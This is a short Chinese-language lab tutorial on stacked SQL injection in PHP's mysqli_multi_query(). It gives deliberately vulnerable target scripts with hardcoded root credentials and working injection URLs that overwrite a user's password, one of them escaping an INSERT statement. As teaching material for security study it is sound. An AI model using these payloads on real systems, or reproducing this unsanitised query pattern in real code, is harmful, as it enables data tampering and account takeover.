准备知识:
- php中multi_query():一次可以执行多个sql语句
- 比如:查询注入id=1;update xxx;
定义:如果后端代码中,数据库执行的方法是multi_query(),那么就可以一次执行多个sql,也就可以支持堆叠注入了。
准备靶场:
php
<?php
$id=$_GET['id'];
$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set name utf8");
$sql="insert into userinfo(id) values($id)";
$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
echo "yes";
}else{
echo "no";
};
?>
验证:
准备sql注入:
ini
http://192.168.190.133/wh067/08-sqli/demo1.php?id=2;update userinfo set password = '123' where id=2;
结果:
如果是更新注入类型:insert
靶场:
php
<?php
$id=$_GET['id'];
$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set name utf8");
// $sql="select * from userinfo where id=$id";
$sql="insert into userinfo(id) values($id)";
$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
echo "yes";
}else{
echo "no";
};
?>
注入sql
ini
http://192.168.190.133/wh067/08-sqli/demo1.php?id=11);update userinfo set password = '666' where id=2;-- -)
如果是更新注入类型:update
靶场:
php
<?php
$id=$_GET['id'];
$account=$_GET['account'];
$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set name utf8");
// $sql="select * from userinfo where id=$id";
// $sql="insert into userinfo(id) values($id)";
$sql="update userinfo set account='$account' where id=$id";
$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
echo "yes";
}else{
echo "no";
};
?>